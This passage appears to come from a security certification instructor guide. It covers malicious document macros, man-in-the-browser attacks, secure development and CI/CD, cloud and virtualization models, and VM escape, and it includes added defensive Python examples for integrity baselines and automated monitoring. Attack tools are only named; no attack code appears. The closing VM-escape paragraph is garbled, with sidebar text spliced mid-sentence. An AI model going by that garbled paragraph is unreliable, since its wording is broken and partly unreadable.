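        return compare(load_baseline(Path(tmp, "baseline.json")), snapshot(root))

if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Keep the baseline file somewhere the web server's account cannot write to, or sign it, because the first thing a web shell operator will do after landing is re-baseline; diff against a known-good copy is the same idea applied to one file at a time.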
A common exploit for a vulnerable web server is to upload a cryptominer, misusing
the server's CPU resources to try to obtain new cryptocurrency. You can use Linux
utilities such as top and free to diagnose excessive CPU and memory resource
consumption by such malware.

This white paper describes the use of Bash and Python attack tools (f5.com/labs/articles/
threat-intelligence/attackers-use-new--sophisticated-ways-to-install-cryptominers).

Show Slide(s): Macros and Visual Basic for Applications (VBA)

Macros and Visual Basic for Applications (VBA)

Teaching Tip: Students need to look out for macros or document scripts that download binary
data or try to execute scripts in other languages.

A document macro is a sequence of actions performed in the context of a word
processor, spreadsheet, or presentation file. While the user may be able to record
macro steps using the GUI, ultimately macros are coded in a scripting language.
Microsoft Office uses the Visual Basic for Applications (VBA) language, while PDF
documents use JavaScript. Microsoft Office document macros can be inspected
using ALT+F11. Other vendors and open-source software also implement macro
functionality, using languages such as Basic or Python.
A malicious actor will try to use a macro-enabled document to execute arbitrary
code. For example, a Word document could be the vector for executing a malicious
PowerShell script. Macros are disabled by default in Office, but the attacker may be
able to use a social engineering attack to get the user to change the policy.
With PDF, the JavaScript might be embedded within the document and designed to
exploit a known vulnerability in the reader software to execute without authorization
(sentinelone.com/blog/malicious-pdfs-revealing-techniques-behind-attacks).

Man-in-the-Browser Attack

Show Slide(s): Man-in-the-Browser Attack

A man-in-the-browser (MitB) attack is a specific type of on-path attack where the web
browser is compromised. Depending on the level of privilege obtained, the attacker
may be able to inspect session cookies, certificates, and data, change browser settings,
perform redirection, and inject code.
A MitB attack may be accomplished by installing malicious plug-ins or scripts or
intercepting calls between the browser process and DLLs (attack.mitre.org/techniques/
T1185). The Browser Exploitation Framework (BeEF) (beefproject.com) is one well
known MitB tool. There are various vulnerability exploit kits that can be installed to a
website to actively try to exploit vulnerabilities in clients browsing the site (trendmicro.
com/vinfo/ie/security/definition/exploit-kit). These kits may either be installed to a
legitimate site without the owner's knowledge (by compromising access control on
the web server) and load in an iFrame (invisible to the user), or the attacker may use
phishing/social engineering techniques to trick users into visiting the site.

The Browser Exploitation Framework (BeEF) uses a script to hook a browser.
The tool can be used to inspect session data and inject code.


Review Activity:
Secure Script Environments
Answer the following questions:

1. You have been asked to investigate a web server for possible intrusion. You
identify a script with the following code. What language is the code in and
does it seem likely to be malicious?

    import os, socket, syslog

    def r_conn(ip):
        s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
        s.connect(("logging.trusted.foo",514))
        ...

The code is written in Python. It uses various modules with default library code to
interact with the OS and network, and also the syslog logging platform. The first lines
of code define a function to connect to a host over port 514 (syslog). SOCK_DGRAM
is a UDP connection, which is standard for syslog. Most likely the script is for remote
logging and unlikely to be malicious, especially if trusted.foo is a known domain.

2. Which tools can you use to restrict the use of PowerShell on Windows
clients?

There are various group policy-based mechanisms, but for Windows 10, the Windows
Defender Application Control (WDAC) framework provides the most powerful toolset
for execution control policies.

3. A log shows that a PowerShell IEX process attempted to create a thread
in the target image c:\Windows\System32\lsass.exe. What is the aim of
this attack?

The Local Security Authority Subsystem Service (LSASS) enforces security policies,
including authentication and password changes. Consequently, it holds hashes of user
passwords in memory. Attacks on lsass.exe are typically credential dumping to steal
those hashes.

4. You are discussing a security awareness training program for an SME's
employees. The business owner asserts that as they do not run Microsoft
Office desktop apps there should be no need to cover document security
and risks from embedded macros and scripts. Should you agree and not run
this part of the program?

No. While Visual Basic for Applications (VBA) can only be used with Microsoft Office,
other types of document can contain embedded scripts, such as JavaScript in PDFs.
Other Office suites, such as OpenOffice and LibreOffice, use scripting languages for
macros too.


Topic 14E
Summarize Deployment and Automation Concepts

EXAM OBJECTIVES COVERED
2.3 Summarize secure application development, deployment, and automation concepts

Teaching Tip: We conclude the development lesson with a look at the remaining content
examples from objective 2.3, which cluster around the general concepts of deployment
and automation.

Most organizations use Agile methodologies, involving a development process of
continuous integration, delivery, and deployment. You will need to be able to support
the creation and use of secure development and staging environments, plus the use of
provisioning and deprovisioning tools.

Application Development, Deployment, and Automation

Show Slide(s): Application Development, Deployment, and Automation

A DevSecOps culture gives project teams a broad base of development, security,
and operations expertise and experience. This promotes an environment in which
security tasks make increased use of automation. Automation is the completion of
an administrative task without human intervention. Task automation steps may be
configurable through a GUI control panel, via a command line, or via an API called
by scripts. Tasks can be automated to provision resources, add accounts, assign
permissions, perform incident detection and response, and any number of other
network security tasks.
Manual configuration introduces a lot of scope for making errors. A technician may be
unsure of best practice, or there may be a lack of documentation. Over time, this leads to
many small discrepancies in the way instances and services are configured. These small
discrepancies can become big problems when it comes to maintaining, updating, and
securing IT and cloud infrastructure. Automation provides better scalability and elasticity:
• Scalability means that the costs involved in supplying the service to more users are
linear. For example, if the number of users doubles in a scalable system, the costs to
maintain the same level of service would also double (or less than double). If costs
more than double, the system is less scalable.

• Elasticity refers to the system's ability to handle changes on demand in real time.
A system with high elasticity will not experience loss of service or performance if
demand suddenly doubles (or triples, or quadruples). Conversely, it may be important
for the system to be able to reduce costs when demand is low. Elasticity is a common
selling point for cloud services. Instead of running a cloud resource for 24 hours a day,
7 days a week, that resource can diminish in power or shut down completely when
demand for that resource is low. When demand picks up again, the resource will grow
in power to the level required. This results in cost-effective operations.

Secure Application Development Environments

Show Slide(s): Secure Application Development Environments

Teaching Tip: This syllabus revision has removed waterfall and Agile as explicit content
examples. We need to mention them to explain "continuous," but students should not
need to know the development life cycle phases in anything other than very general terms.

Security must be a key component of the application or automation design process.
Even a simple form and script combination can make a web server vulnerable if the
script is not well written. A software development life cycle (SDLC) divides the
creation and maintenance of software into discrete phases. There are two principal
SDLCs: the waterfall model and Agile development. Both these models stress
the importance of requirements analysis and quality processes to the success of
development projects.

Quality Assurance (QA)
Quality processes are how an organization tests a system to identify whether it complies
with a set of requirements and expectations. These requirements and expectations can
be driven by risk-based assessments, or they can be driven by internal and external
compliance factors, such as industry regulations and company-defined quality standards.
Quality control (QC) is the process of determining whether a system is free from defects or
deficiencies. QC procedures are themselves defined by a quality assurance (QA) process,
which analyzes what constitutes "quality" and how it can be measured and checked.

Development Environments
To meet the demands of the life cycle model and quality assurance, code is normally
passed through several different environments:
• Development—the code will be hosted on a secure server. Each developer will check
out a portion of code for editing on his or her local machine. The local machine will
normally be configured with a sandbox for local testing. This ensures that whatever
other processes are being run locally do not interfere with or compromise the
application being developed.
• Test/integration—in this environment, code from multiple developers is merged
to a single master copy and subjected to basic unit and functional tests (either
automated or by human testers). These tests aim to ensure that the code builds
correctly and fulfills the functions required by the design.
• Staging—this is a mirror of the production environment but may use test or sample
data and will have additional access controls so that it is only accessible to test
users. Testing at this stage will focus more on usability and performance.
• Production—the application is released to end users.

Secure development environments. (Images © 123RF.com.)


It is important to be able to validate the integrity of each coding environment.
Compromise in any environment could lead to the release of compromised code.
• Sandboxing—each development environment should be segmented from the
others. No processes should be able to connect to anything outside the sandbox.
Only the minimum tools and services necessary to perform code development and
testing should be allowed in each sandbox.
• Secure configuration baseline—each development environment should be built to
the same specification, possibly using automated provisioning.
• Integrity measurement—this process determines whether the development
environment varies from the configuration baseline. Perhaps a developer added an
unauthorized tool to solve some programming issue. Integrity measurement may
be performed by scanning for unsigned files or files that do not otherwise match the
baseline. The Linux diff command can be used to compare file structures
(linux.die.net/man/1/diff).
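As an added example (not code from the guide), the following Python script performs the integrity measurement described above: it records a hash manifest as the configuration baseline for a development environment and then reports the files that have been added, removed, or modified since. The directory layout and file contents are constructed for the demonstration.

```python
"""Integrity measurement of a development environment against a baseline.

Added example (not from the course text): builds a manifest of file hashes
for an environment, keeps it as the configuration baseline, and later reports
drift (added, removed, or modified files). The sample directory tree and
file contents are constructed here for illustration.
"""
import hashlib
import os
import tempfile


def build_manifest(root):
    """Return {relative_path: sha256_hex} for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            manifest[rel] = digest.hexdigest()
    return manifest


def compare_manifests(baseline, current):
    """Report how the current manifest differs from the baseline (sorted lists)."""
    base_paths, cur_paths = set(baseline), set(current)
    return {
        "added": sorted(cur_paths - base_paths),
        "removed": sorted(base_paths - cur_paths),
        "modified": sorted(p for p in base_paths & cur_paths
                           if baseline[p] != current[p]),
    }


def write_file(root, rel, data):
    """Create rel (with any parent directories) under root with the given bytes."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)


def demo():
    """Build a baseline, introduce drift, and return the drift report."""
    with tempfile.TemporaryDirectory() as env:
        # Constructed sample environment: approved tooling and a config file.
        write_file(env, "bin/build.sh", b"#!/bin/sh\nmake all\n")
        write_file(env, "etc/app.conf", b"debug=false\n")
        write_file(env, "lib/helper.py", b"def f():\n    return 1\n")
        baseline = build_manifest(env)

        # Drift: a developer drops in an unauthorized tool, edits the config,
        # and deletes a library that the baseline expects to be present.
        write_file(env, "bin/unapproved-tool", b"\x7fELF-placeholder")
        write_file(env, "etc/app.conf", b"debug=true\n")
        os.remove(os.path.join(env, "lib/helper.py"))

        return compare_manifests(baseline, build_manifest(env))


if __name__ == "__main__":
    for kind, paths in demo().items():
        for path in paths:
            print(f"{kind:8s} {path}")
```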

Provisioning, Deprovisioning, and Version Control

Show Slide(s): Provisioning, Deprovisioning, and Version Control

The use of development life cycle models and QA processes extends past development
and testing to the deployment and maintenance of an application or script-based
automation task.

Provisioning
Provisioning is the process of deploying an application to the target environment,
such as enterprise desktops, mobile devices, or cloud infrastructure. An enterprise
provisioning manager might assemble multiple applications in a package. Alternatively,
the OS and applications might be defined as a single instance for deployment on a
virtualized platform. The provisioning process must account for changes to any of
these applications so that packages or instances are updated with the latest version.

Deprovisioning
Deprovisioning is the process of removing an application from packages or instances.
This might be necessary if software has to be completely rewritten or no longer
satisfies its purpose. As well as removing the application itself, it is also important to
make appropriate environment changes to remove any configurations, such as open
firewall ports, that were made just to support that application.

Version Control
Version control is an ID system for each iteration of a software product. Most version
control numbers represent both the version, as made known to the customer or end
user, and internal build numbers for use in the development process. Version control
supports the change management process for software development projects. Most
software development environments use a build server to maintain a repository of
previous versions of the source code. When a developer commits new or changed
code to the repository, the new source code is tagged with an updated version number
and the old version archived. This allows changes to be rolled back if a problem is
discovered.

Automation/Scripting Release Paradigms

Show Slide(s): Automation/Scripting Release Paradigms

Teaching Tip: Make sure students can distinguish these phases.

Coding projects are managed using different life cycle models. The waterfall model
software development life cycle (SDLC) is an older paradigm that focuses on the
successful completion of monolithic projects that progress from stage to stage. The
more recent Agile paradigm uses iterative processes to release well-tested code
in smaller blocks or units. In this model, development and provisioning tasks are
conceived as continuous.

Continuous Integration
Continuous integration (CI) is the principle that developers should commit and test
updates often—every day or sometimes even more frequently. This is designed to
reduce the chances of two developers spending time on code changes that are later
found to conflict with one another. CI aims to detect and resolve these conflicts early,
as it is easier to diagnose one or two conflicts or build errors than it is to diagnose the
causes of tens of them. For effective CI, it is important to use an automated test suite
to validate each build quickly.

Continuous Delivery
Where CI is about managing code in development, continuous delivery is about
testing all of the infrastructure that supports the app, including networking, database
functionality, client software, and so on.

Continuous Deployment
Where continuous delivery tests that an app version and its supporting infrastructure
are ready for production, continuous deployment is the separate process of actually
making changes to the production environment to support the new app version.

Automation and continuous release paradigms. (Images © 123RF.com.)

Continuous Monitoring and Automated Courses of Action

An automation solution will have a system of continuous monitoring to detect service
failures and security incidents. Continuous monitoring might use a locally installed
agent or heartbeat protocol or may involve checking availability remotely. As well as
monitoring the primary site, it is important to observe the failover components to
ensure that they are recovery ready. You can also automate the courses of action that
a monitoring system takes, like configuring an IPS to automatically block traffic that
it deems suspicious. This sort of capability is provided by security orchestration,
automation, and response (SOAR) management software.
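An added example (not from the guide) of the monitoring and automated response loop just described, in Python: it tracks heartbeats from a primary node and its failover node, raises an alert when the failover node has gone silent (so it is not recovery ready), and emits an IPS block action once one source has produced repeated alerts. The event stream, node names, addresses, and thresholds are constructed assumptions.

```python
"""Continuous monitoring with automated courses of action.

Added example (not from the course text): processes a constructed stream of
heartbeat and IDS events, flags nodes (primary and failover) whose heartbeat
has gone stale, and returns the actions a SOAR-style playbook would take.
Node names, addresses, and thresholds are assumptions for illustration.
"""
from collections import Counter

# Constructed event stream. "t" is seconds since an arbitrary epoch.
SAMPLE_EVENTS = [
    {"t": 0,  "type": "heartbeat", "node": "web-primary"},
    {"t": 0,  "type": "heartbeat", "node": "web-failover"},
    {"t": 30, "type": "heartbeat", "node": "web-primary"},
    {"t": 35, "type": "ids_alert", "src": "198.51.100.7", "sig": "sqli"},
    {"t": 60, "type": "heartbeat", "node": "web-primary"},
    {"t": 61, "type": "ids_alert", "src": "198.51.100.7", "sig": "sqli"},
    {"t": 62, "type": "ids_alert", "src": "198.51.100.7", "sig": "xss"},
    {"t": 90, "type": "heartbeat", "node": "web-primary"},
    {"t": 95, "type": "ids_alert", "src": "203.0.113.9", "sig": "scan"},
]

ROLES = {"web-primary": "primary", "web-failover": "failover"}
STALE_AFTER = 45       # seconds without a heartbeat before a node counts as down
BLOCK_THRESHOLD = 3    # alerts from one source before the IPS block rule is pushed


def evaluate(events, now, roles=ROLES, stale_after=STALE_AFTER,
             block_threshold=BLOCK_THRESHOLD):
    """Return the ordered list of (action, target) pairs for the event stream."""
    last_seen = {}
    alerts = Counter()
    blocked = set()
    actions = []

    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["type"] == "heartbeat":
            last_seen[ev["node"]] = ev["t"]
        elif ev["type"] == "ids_alert":
            alerts[ev["src"]] += 1
            # Course of action: after repeated alerts from one source, push a
            # block rule to the IPS, once per source.
            if alerts[ev["src"]] >= block_threshold and ev["src"] not in blocked:
                blocked.add(ev["src"])
                actions.append(("ips_block", ev["src"]))

    # Heartbeat check: every known node, not only the primary, must have
    # reported recently. A silent failover node is not recovery ready.
    for node, role in roles.items():
        seen = last_seen.get(node)
        if seen is None or now - seen > stale_after:
            if role == "primary":
                actions.append(("failover", node))
            else:
                actions.append(("alert_failover_not_ready", node))
    return actions


if __name__ == "__main__":
    for action, target in evaluate(SAMPLE_EVENTS, now=100):
        print(f"{action:24s} {target}")
```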

Continuous Validation
An application model is a statement of the requirements driving the software
development project. The requirements model is tested using processes of verification
and validation (V&V):
• Verification is a compliance testing process to ensure that the product or system
meets its design goals.
• Validation is the process of determining whether the application is fit for purpose
(so for instance, its design goals meet the user requirements).

With the continuous paradigm, feedback from delivery and deployment must be
monitored and evaluated to ensure that the design goals continue to meet user and
security requirements. The monitoring and validation processes must also ensure that
there is no drift from the secure configuration baseline.

Software Diversity

Show Slide(s): Software Diversity

An application's runtime environment will use one of two approaches for execution on
a host system:
• Compiled code is converted to binary machine language that can run independently
on the target OS.
• Interpreted code is packaged pretty much as is but is compiled line-by-line by an
interpreter, such as PowerShell or JavaScript. This offers a solution that is platform
independent because the interpreter resolves the differences between OS types
and versions.

Software diversity can refer to obfuscation techniques to make code difficult to detect
as malicious. This is widely used by threat actors in the form of shellcode compilers
to avoid signature detection, such as the venerable Shikata Ga Nai (fireeye.com/blog/
threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html). This can
be used as a defensive technique. Obfuscating API methods and automation code
makes it harder for a threat actor to reverse engineer and analyze the code to discover
weaknesses.
There is also general research interest in security by diversity. This works on the
principle that attacks are harder to develop against non-standard environments. A
monoculture environment, such as a Windows domain network, presents a fairly
predictable attack surface with plenty of commodity malware tools available to exploit
misconfigurations. Using a wide range of development tools and application
vendors and versions can make attack strategies harder to research. As with security
by obscurity, this will not defeat a targeted attack, but it can partially mitigate risks
from less motivated threat actors, who will simply move to the next, easier target.
On the other hand, this sort of complexity will tend to lead to greater incidence of
configuration errors as technicians and developers struggle to master unfamiliar
technologies.


Review Activity:
Deployment and Automation Concepts
Answer the following questions:

1. What is secure staging?

Creating secure development environments for the different phases of a software
development project (initial development server, test/integration server, staging [user
test] server, production server).

2. What feature is essential for managing code iterations within the
provisioning and deprovisioning processes?

Version control is an ID system for each iteration of a software product.

3. Which life cycle process manages continuous release of code to the
production environment?

Continuous deployment.

4. How does a specially configured compiler inhibit attacks through
software diversity?

The compiler can apply obfuscation routines to make the code difficult for a threat
actor to reverse engineer and analyze for vulnerabilities.


Lesson 14
Summary
You should be able to identify and classify application attacks and summarize
development and coding best practices.

Teaching Tip: Check that students are confident about the content that has been
covered. If there is time, revisit any content examples that they have questions
about. If you have used all the available time for this lesson block, note the issues,
and schedule time for a review later in the course.

Guidelines for Secure Application Development
Follow these guidelines for initiating or improving application development projects:
• Train developers on secure coding techniques to provide specific mitigation
against attacks:
  • Overflow, race condition, and DLL/driver manipulation attacks that exploit
  vulnerable code.
  • Injection attacks (XSS, SQL, XML, LDAP, shellcode) that exploit lack of input
  validation.
  • Replay and request forgery attacks that exploit lack of secure authentication and
  authorization mechanisms.
• Review and test code using static and dynamic analysis, paying particular attention
to input validation, output encoding, error handling, and data exposure.
• Use automation and continuous integration/delivery/deployment/monitoring/
validation to ensure secure and consistent development, staging, and production
environments.
• Document use of approved coding languages and launch locations, ideally with code
signing, to make malicious code easier to detect.
Lesson 15
Implementing Secure Cloud Solutions

LESSON INTRODUCTION

Teaching Tip: This lesson follows on from application development to look at
deploying apps and services through virtualization and the cloud. There is a
significant amount of new cloud content in this exam update, so be prepared to
allocate this section plenty of time.

The main idea behind cloud computing is that you can access and manage your data
and applications from any host, anywhere in the world, while the storage method and
location are hidden or abstracted through virtualization. Cloud applications—whether
accessed as public services or provisioned over private virtualization infrastructure—
are rapidly overtaking on-premises service delivery models. Considerations of security
in and of the cloud will form an increasingly important part of your career as a security
professional.

Lesson Objectives
In this lesson, you will:
• Summarize secure cloud and virtualization services.
• Apply cloud security solutions.
• Summarize infrastructure as code concepts.

Topic 15A
Summarize Secure Cloud and
Virtualization Services

EXAM OBJECTIVES COVERED
2.2 Summarize virtualization and cloud computing concepts

Teaching Tip: This topic provides an overview of the technologies and goals of cloud
computing and considers some of the security impacts. The basic principles of cloud
models and virtualization technologies should be familiar from A+ and Network+, so
focus on security implications.

In a traditional infrastructure, an attacker may find intrusions to be difficult as the
network can be isolated from the outside world. In a cloud environment, the attacker
may simply need to have an Internet connection and a dictionary of stolen password
hashes or SSH keys to cause a breach. A lack of oversight in the security procedures of
cloud providers can dramatically increase the risk an organization takes. As a security
professional, you must be able to assess the threats and vulnerabilities associated with
cloud service and delivery models, plus the virtualization technologies that underpin
them.

Cloud Deployment Models

Show Slide(s): Cloud Deployment Models

Teaching Tip: Students need to be able to distinguish cloud provider models (private
versus public, for instance) and the features and uses of the different XaaS
implementations.

A cloud deployment model classifies how the service is owned and provisioned. It is
important to recognize the different impacts deployment models have on threats and
vulnerabilities. Cloud deployment models can be broadly categorized as follows:
• Public (or multi-tenant)—a service offered over the Internet by cloud service
providers (CSPs) to cloud consumers. With this model, businesses can offer
subscriptions or pay-as-you-go financing, while at the same time providing
lower-tier services free of charge. As a shared resource, there are risks regarding
performance and security. Multi-cloud architectures are where an organization
uses services from multiple CSPs.
• Hosted Private—hosted by a third-party for the exclusive use of the organization.
This is more secure and can guarantee a better level of performance but is
correspondingly more expensive.
• Private—cloud infrastructure that is completely private to and owned by the
organization. In this case, there is likely to be one business unit dedicated to
managing the cloud while other business units make use of it. With private cloud
computing, organizations can exercise greater control over the privacy and security
of their services. This type of delivery method is geared more toward banking and
governmental services that require strict access control in their operations.
This type of cloud could be on premise or offsite relative to the other business
units. An onsite link can obviously deliver better performance and is less likely to
be subject to outages (loss of an Internet link, for instance). On the other hand, a
dedicated offsite facility may provide better shared access for multiple users in
different locations.
• Community—this is where several organizations share the costs of either a hosted
private or fully private cloud. This is usually done in order to pool resources for a
common concern, like standardization and security policies.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15A


There will also be cloud computing solutions that implement some sort of hybrid
public/private/community/hosted/onsite/offsite solution. For example, a travel
organization may run a sales website for most of the year using a private cloud
but break out the solution to a public cloud at times when much higher utilization
is forecast.
Flexibility is a key advantage of cloud computing, but the implications for data risk
must be well understood when moving data between private and public storage
environments.

Cloud Service Models

Show Slide(s): Cloud Service Models

As well as the ownership model (public, private, hybrid, or community), cloud services
are often differentiated on the level of complexity and pre-configuration provided.
These models are referred to as something or anything as a service (XaaS). The three
most common implementations are infrastructure, software, and platform.

Infrastructure as a Service
Infrastructure as a service (IaaS) is a means of provisioning IT resources such as
servers, load balancers, and storage area network (SAN) components quickly. Rather
than purchase these components and the Internet links they require, you rent them on
an as-needed basis from the service provider's data center. Examples include Amazon
Elastic Compute Cloud (aws.amazon.com/ec2), Microsoft Azure Virtual Machines
(azure.microsoft.com/services/virtual-machines), Oracle Cloud (oracle.com/cloud), and
OpenStack (openstack.org).

Software as a Service
Software as a service (SaaS) is a different model of provisioning software
applications. Rather than purchasing software licenses for a given number of seats,
a business would access software hosted on a supplier's servers on a pay-as-you-go
or lease arrangement (on-demand). Virtual infrastructure allows developers to
provision on-demand applications much more quickly than previously. The applications
can be developed and tested in the cloud without the need to test and deploy on
client computers. Examples include Microsoft Office 365 (microsoft.com/en-us/
microsoft-365/enterprise), Salesforce (salesforce.com), and Google G Suite (gsuite.
google.com).

Platform as a Service
Platform as a service (PaaS) provides resources somewhere between SaaS and IaaS.
A typical PaaS solution would provide servers and storage network infrastructure
(as per IaaS) but also provide a multi-tier web application/database platform on top.
This platform could be based on Oracle or MS SQL or PHP and MySQL. Examples
include Oracle Database (oracle.com/database), Microsoft Azure SQL Database (azure.
microsoft.com/services/sql-database), and Google App Engine (cloud.google.com/
appengine).
As distinct from SaaS though, this platform would not be configured to actually
do anything. Your own developers would have to create the software (the CRM or
e-commerce application) that runs using the platform. The service provider would
be responsible for the integrity and availability of the platform components, but you
would be responsible for the security of the application you created on the platform.


Dashboard for Amazon Web Services Elastic Compute Cloud (EC2) IaaS/PaaS.
(Screenshot used with permission from Amazon.com.)

Anything as a Service

Show Slide(s): Anything as a Service

Teaching Tip: We've chosen to treat this content example in terms of the
responsibility matrix. Wikipedia has a comprehensive list if the students want to
go acronym hunting (en.wikipedia.org/wiki/As_a_service). The acronym list does
reference monitoring as a service, so there is a glossary entry for that.

There are many other examples of XaaS, reflecting the idea that anything can be
provisioned as a cloud service. For example, database as a service and network as a
service can be distinguished as more specific types of platform as a service. The key
security consideration with all these models is identifying where responsibilities lie.
This is often referred to as security in the cloud versus security of the cloud. Security
in the cloud is the things you must take responsibility for; security of the cloud is the
things the CSP manages. These responsibilities vary according to the service type:

Responsibility                                 | IaaS         | PaaS         | SaaS
IAM                                            | You          | You          | You (using CSP toolset)
Data security (CIA attributes/backup)          | You          | You          | You/CSP/Both
Data privacy                                   | You/CSP/Both | You/CSP/Both | You/CSP/Both
Application code/configuration                 | You          | You          | CSP
Virtual network/firewall                       | You          | You/CSP      | CSP
Middleware (database) code/configuration       | You          | CSP          | CSP
Virtual Guest OS                               | You          | CSP          | CSP
Virtualization layer                           | CSP          | CSP          | CSP
Hardware layer (compute, storage, networking)  | CSP          | CSP          | CSP

Note that this matrix identifies generic responsibilities only. Specific terms must be set out in
a contract and service level agreement (SLA) with the CSP.


Security as a Service

Show Slide(s): Security as a Service

The breadth of technologies requiring specialist security knowledge and configuration
makes it likely that companies will need to depend on third-party support at some
point. You can classify such support in three general "tiers":
• Consultants—the experience and perspective of a third-party professional can
be hugely useful in improving security awareness and capabilities in any type of
organization (small to large). Consultants could be used for "big picture" framework
analysis and alignment or for more specific or product-focused projects (pen
testing, SIEM rollout, and so on). It is also fairly simple to control costs when using
consultants if they are used to develop capabilities rather than implement them.
Where consultants come to own the security function, it can be difficult to change
or sever the relationship.
• Managed Security Services Provider (MSSP)—a means of fully outsourcing
responsibility for information assurance to a third party. This type of solution is
expensive but can be a good fit for an SME that has experienced rapid growth and
has no in-house security capability. Of course, this type of outsourcing places a huge
amount of trust in the MSSP. Maintaining effective oversight of the MSSP requires
a good degree of internal security awareness and expertise. There could also be
significant challenges in industries exposed to high degrees of regulation in terms of
information processing.
• Security as a Service (SECaaS)—can mean lots of different things, but is typically
distinguished from an MSSP as being a means of implementing a particular security
control, such as virus scanning or SIEM-like functionality, in the cloud. Typically,
there would be a connector to the cloud service installed locally. For example, an
antivirus agent would scan files locally but be managed and updated from the
cloud provider; similarly a log collector would submit events to the cloud service
for aggregation and correlation. Examples include Cloudflare (cloudflare.com/saas),
Mandiant/FireEye (fireeye.com/mandiant/managed-detection-and-response.html),
and SonicWall (sonicwall.com/solutions/service-provider/security-as-a-service).

Virtualization Technologies and Hypervisor Types

Show Slide(s): Virtualization Technologies and Hypervisor Types

Teaching Tip: This is a recap of the basics. Hopefully students should know this
material already.

Virtualization means that multiple operating systems can be installed and run
simultaneously on a single computer. A virtual platform requires at least three
components:
• Host hardware—the platform that will host the virtual environment. Optionally,
there may be multiple hosts networked together.
• Hypervisor/Virtual Machine Monitor (VMM)—manages the virtual machine
environment and facilitates interaction with the computer hardware and network.
• Guest operating systems, Virtual Machines (VM), or instances—operating systems
installed under the virtual environment.

One basic distinction that can be made between virtual platforms is between host
and bare metal methods of interacting with the host hardware. In a guest OS (or
host-based) system, the hypervisor application (known as a Type II hypervisor) is itself
installed onto a host operating system. Examples of host-based hypervisors include
VMware Workstation, Oracle Virtual Box, and Parallels Workstation. The hypervisor
software must support the host OS.


Guest OS virtualization (Type II hypervisor)—The hypervisor is an application running within
a native OS, and guest OSes are installed within the hypervisor.

A bare metal virtual platform means that the hypervisor (Type I hypervisor) is installed
directly onto the computer and manages access to the host hardware without going
through a host OS. Examples include VMware ESXi Server, Microsoft's Hyper-V, and
Citrix's XEN Server. The hardware needs only support the base system requirements
for the hypervisor plus resources for the type and number of guest OSes that will
be installed.

Type I bare metal hypervisor—The hypervisor is installed directly on the host hardware along with
a management application, then VMs are installed within the hypervisor.

Virtual Desktop Infrastructure and Thin Clients

Show Slide(s): Virtual Desktop Infrastructure and Thin Clients

Virtual desktop infrastructure (VDI) refers to using a VM as a means of provisioning
corporate desktops. In a typical VDI, desktop computers are replaced by low-spec,
low-power thin client computers. When the thin client starts, it boots a minimal OS,
allowing the user to log on to a VM stored on the company server infrastructure.
The user makes a connection to the VM using some sort of remote desktop protocol


(Microsoft Remote Desktop or Citrix ICA, for instance). The thin client has to find the
correct image and use an appropriate authentication mechanism. There may be a 1:1
mapping based on machine name or IP address or the process of finding an image may
be handled by a connection broker.
All application processing and data storage in the virtual desktop environment
(VDE) or workspace is performed by the server. The thin client computer must only
be powerful enough to display the screen image, play audio, and transfer mouse, key
commands and video, and audio information over the network. All data is stored on
the server, so it is easier to back up and the desktop VMs are easier to support and
troubleshoot. They are better "locked" against unsecure user practices because any
changes to the VM can easily be overwritten from the template image. With VDI, it is
also easier for a company to completely offload their IT infrastructure to a third party
services company.
The main disadvantage is that in the event of a failure in the server and network
infrastructure, users have no local processing ability, so downtime events may be more
costly in terms of lost productivity.

Application Virtualization and Container Virtualization

Show Slide(s): Application Virtualization and Container Virtualization

Application virtualization is a more limited type of VDI. Rather than run the whole
client desktop as a virtual platform, the client either accesses an application hosted on
a server or streams the application from the server to the client for local processing.
Most application virtualization solutions are based on Citrix XenApp (formerly
MetaFrame Presentation Server), though Microsoft has developed an App-V product
with its Windows Server range and VMware has the ThinApp product. These solution
types are now often used with HTML5 remote desktop apps, referred to as clientless
because users can access them through ordinary web browser software.
Application cell/container virtualization dispenses with the idea of a hypervisor and
instead enforces resource separation at the operating system level. The OS defines
isolated "cells" for each user instance to run in. Each cell or container is allocated CPU
and memory resources, but the processes all run through the native OS kernel. These
containers may run slightly different distributions but cannot run guest OSes of
different types (you could not run Windows or Ubuntu in a Red Hat Linux container, for
instance). Alternatively, the containers might run separate application processes, in
which case the variables and libraries required by the application process are added to
the container.
One of the best-known container virtualization products is Docker (docker.com).
Containerization underpins many cloud services. In particular it supports microservices
and serverless architecture. Containerization is also being widely used to implement
corporate workspaces on mobile devices.


Comparison of VMs versus containers.

VM Escape Protection

Show Slide(s): VM Escape Protection

Teaching Tip: One of the main concerns is that the technology underpinning the
virtual platform will not be well understood by developers and administrators. Details
of the implementation may also be proprietary. This might be a good opportunity to
discuss Meltdown and Spectre
(csoonline.com/article/spectre-and-meltdown-explained-what-they-are-how-they-work-whats-at-risk.html).
These vulnerabilities aren't specific to hypervisors, but they are particularly serious in
a virtualized environment. You can

VM escaping refers to malware running on a guest OS jumping to another guest
or to the host. To do this, the malware must identify that it is running in a virtual
environment, which is usually simple to do. One means of doing so is through a timing
attack. The classic timing attack is to send multiple usernames to an authentication
server and measure the server response times. An invalid username will usually
be rejected very quickly, but a valid one will take longer (while the authentication
server checks the password). This allows the attacker to harvest valid usernames.
Malware can use a timing attack within a guest OS to detect whether it is running in
a VM (certain operations may take a distinct amount of time compared to a "real"
environment). There are numerous other "signatures" that an attacker could use to
detect the presence of virtualized system hardware. The next step in VM escaping is for
the attacker to compromise the hypervisor. Security researchers have been focusing on
this type of exploit and several vulnerabilities have been found in popular hypervisors.
One serious implication of VM escaping is where virtualization is used for hosted
spectre-and-
meltdown-explained- applications. If you have a hosted web server, apart from trusting the hosting provider
what-they-are-how- with your data, you have no idea what other applications might be running in other
they-work-whats- customers' Ms. or e ample, consider a scenario where you have an e commerce web
at-risk.html). These server installed on a virtual server leased from an ISP. If a third-party installs another
vulnerabilities guest OS with malware that can subvert the virtual server's hypervisor, they might
aren't specific to
hypervisors, but
be able to gain access to your server or to data held in the memory of the physical
